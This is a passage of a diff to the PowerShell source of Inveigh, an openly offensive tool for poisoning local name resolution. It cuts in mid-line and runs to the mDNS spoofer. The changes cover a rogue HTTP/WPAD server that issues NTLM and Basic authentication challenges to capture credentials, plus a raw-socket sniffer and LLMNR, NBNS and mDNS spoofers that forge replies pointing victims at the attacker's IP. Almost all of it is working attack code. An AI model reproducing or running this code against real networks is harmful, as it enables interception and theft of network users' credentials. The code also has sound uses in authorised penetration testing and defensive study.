$inveigh.request.RawUrl)) + $HTTP_message = $WPADResponse + $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") } - else + elseif($HTTPResponse) { - [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse) + $HTTP_message = $HTTPResponse + + if($HTTPContentType) + { + $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTPContentType) + } + } - + + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) } } else { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + } - if($inveigh.request.RawUrl -match '/wpad.dat') - { - $inveigh.message = $WPADResponse - } - elseif($HTTPResponse) + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length) + + if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close) + { + $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM) + } + elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) + { + $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") + } + + $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary + $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)) + $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20)) + $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a)) + $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)) + $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a)) + $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a)) + + if($HTTP_header_authenticate -and $HTTP_header_authenticate_data) + { + $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_header_content_type) + { + $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_header_cache_control) + { + $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_send) + { + $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) + $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + } + + Start-Sleep -m 10 + $HTTP_request_raw_URL_old = $HTTP_request_raw_URL + $HTTP_client_handle_old = $HTTP_client.Client.Handle + + if($HTTP_client_close) + { + + if($proxy_listener) { - $inveigh.message = $HTTPResponse + $HTTP_client.Client.Close() } else { - $inveigh.message = $null + $HTTP_client.Close() } - [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) } - } - else - { - [Byte[]]$HTTP_buffer = $null - } - if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth) - { - $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) - } - elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat')) - { - $inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm") } else { - $inveigh.response.StatusCode = 200 + $HTTP_client.Close() + $HTTP_client_close = $true } - - $inveigh.response.ContentLength64 = $HTTP_buffer.Length - $HTTP_stream = $inveigh.response.OutputStream - $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length) - $HTTP_stream.Close() + } - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + $HTTP_client.Close() + start-sleep -s 1 + $HTTP_listener.Server.Blocking = $false + Start-Sleep -s 1 + $HTTP_listener.Server.Close() + Start-Sleep -s 1 + $HTTP_listener.Stop() } # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer $sniffer_scriptblock = { - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL) + param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply, + $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval) + $sniffer_running = $true $byte_in = New-Object System.Byte[] 4 $byte_out = New-Object System.Byte[] 4 $byte_data = New-Object System.Byte[] 4096 @@ -1374,14 +2123,37 @@ $sniffer_scriptblock = $byte_in[1-3] = 0 $byte_out[0] = 1 $byte_out[1-3] = 0 - $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) - $inveigh.sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true) - $inveigh.sniffer_socket.ReceiveBufferSize = 1024 - $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0) - $inveigh.sniffer_socket.Bind($end_point) - $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) + $sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) + $sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true) + $sniffer_socket.ReceiveBufferSize = 4096 + + try + { + $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0) + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") + $sniffer_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") + } + + } + + $sniffer_socket.Bind($end_point) + $sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) [Array]::Reverse($LLMNR_TTL_bytes) + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) [Array]::Reverse($NBNS_TTL_bytes) $LLMNR_learning_log = New-Object System.Collections.Generic.List[string] @@ -1393,46 +2165,33 @@ $sniffer_scriptblock = $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } - if($RunTime) - { - $sniffer_timeout = New-TimeSpan -Minutes $RunTime - $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - while($inveigh.running) + while($inveigh.running -and $sniffer_running) { - $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None) + $packet_data = $sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None) $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data) $binary_reader = New-Object System.IO.BinaryReader($memory_stream) $version_HL = $binary_reader.ReadByte() - $type_of_service= $binary_reader.ReadByte() + $binary_reader.ReadByte() > $null $total_length = DataToUInt16 $binary_reader.ReadBytes(2) - $identification = $binary_reader.ReadBytes(2) - $flags_offset = $binary_reader.ReadBytes(2) - $TTL = $binary_reader.ReadByte() + $binary_reader.ReadBytes(5) > $null $protocol_number = $binary_reader.ReadByte() - $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) + $binary_reader.ReadBytes(2) > $null $source_IP_bytes = $binary_reader.ReadBytes(4) $source_IP = [System.Net.IPAddress]$source_IP_bytes $destination_IP_bytes = $binary_reader.ReadBytes(4) $destination_IP = [System.Net.IPAddress]$destination_IP_bytes - $IP_version = [Int]"0x$(('{0:X}' -f $version_HL)[0])" $header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4 switch($protocol_number) { - + 6 { # TCP $source_port = DataToUInt16 $binary_reader.ReadBytes(2) $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) - $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4) - $ack_number = DataToUInt32 $binary_reader.ReadBytes(12) + $binary_reader.ReadBytes(8) > $null $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 - $TCP_flags = $binary_reader.ReadByte() - $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2) - $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) - $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2) + $binary_reader.ReadBytes(7) > $null $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) switch ($destination_port) @@ -1515,7 +2274,7 @@ $sniffer_scriptblock = $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) $UDP_length = $binary_reader.ReadBytes(2) $UDP_length_uint = DataToUInt16 ($UDP_length) - $binary_reader.ReadBytes(2) + $binary_reader.ReadBytes(2) > $null $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) # Incoming packets @@ -1657,7 +2416,17 @@ $sniffer_scriptblock = $NBNS_UDP_client.Close() $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string") $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + } + } } @@ -1729,7 +2498,7 @@ $sniffer_scriptblock = } elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) { - $NBNS_response_message = "- request is local" + $NBNS_response_message = "- local request" } else { @@ -1743,7 +2512,17 @@ $sniffer_scriptblock = if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00') { $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + } elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) { @@ -1755,10 +2534,191 @@ $sniffer_scriptblock = { $inveigh.valid_host_list.Add($NBNS_query_string) $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + } + + } + + } + + } + + } + + 5353 # mDNS + { + + if([System.BitConverter]::ToString($payload_bytes) -like '*-00-01-80-01') + { + $UDP_length[0] += 10 + $mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)] + $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QU')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $send_socket.SendTo($mDNS_response_packet,$destination_point) + $send_socket.Close() + $mDNS_response_message = "- response sent" + } + else + { + + if($mDNSTypes -notcontains 'QU') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + else + { + $mDNS_response_message = "- not spoofed due to previous capture" + } + + } + + } + + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $UDP_length[0] += 4 + $mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)] + $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x80,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QM')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $send_socket.SendTo($mDNS_response_packet,$destination_point) + $send_socket.Close() + $mDNS_response_message = "- response sent" + } + else + { + + if($mDNSTypes -notcontains 'QM') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + else + { + $mDNS_response_message = "- not spoofed due to previous capture" + } + } + } + + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + } + } 5355 # LLMNR @@ -1841,11 +2801,20 @@ $sniffer_scriptblock = $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355) $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint) $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length) - $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port $LLMNR_UDP_client.Close() $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string") $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + } + } } @@ -1913,10 +2882,21 @@ $sniffer_scriptblock = if(!$LLMNR_request_ignore) { $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + } } + } } @@ -1951,7 +2931,17 @@ $sniffer_scriptblock = { $inveigh.valid_host_list.Add($LLMNR_query_string) $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + } + } } @@ -1964,61 +2954,842 @@ $sniffer_scriptblock = } - if($RunTime) + } + + $binary_reader.Close() + $memory_stream.Dispose() + $memory_stream.Close() +} + +# Unprivileged LLMNR Spoofer ScriptBlock +$LLMNR_spoofer_scriptblock = +{ + param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + + $LLMNR_running = $true + $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + + try + { + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") + $LLMNR_running = $false + + if($inveigh.file_output) { - - if($sniffer_stopwatch.Elapsed -ge $sniffer_timeout) + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer") + } + + } + + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) + + while($inveigh.running -and $LLMNR_running) + { + + try + { + $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) + } + catch + { + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + } + + if($LLMNR_request_data -and [System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now + { + + $LLMNR_response_packet = $LLMNR_request_data[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)]) + $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString + + if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port) + $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $LLMNR_response_message = "- inspect only" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $LLMNR_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $LLMNR_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $LLMNR_response_message = "- previous capture from $source_IP" + } + else + { + $LLMNR_response_message = "- something went wrong" + } + + } + + if($LLMNR_request_data) { + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - if($inveigh.HTTP_listener.IsListening) + if($inveigh.file_output) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") } - $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) - Start-Sleep -m 5 - $inveigh.running = $false - - if($inveigh.HTTPS) + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + } + + } + + $LLMNR_request_data = "" + } + + } + + $LLMNR_UDP_client.Close() + } + +# Unprivileged mDNS Spoofer ScriptBlock +$mDNS_spoofer_scriptblock = +{ + param ($Inspect,$mDNS_response_message,$mDNSTTL,$mDNSTypes,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore) + + $mDNS_running = $true + $mDNS_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5353) + + try + { + $mDNS_UDP_client = New-Object System.Net.Sockets.UdpClient 5353 + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + $mDNS_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer") + } + + } + + $mDNS_multicast_group = 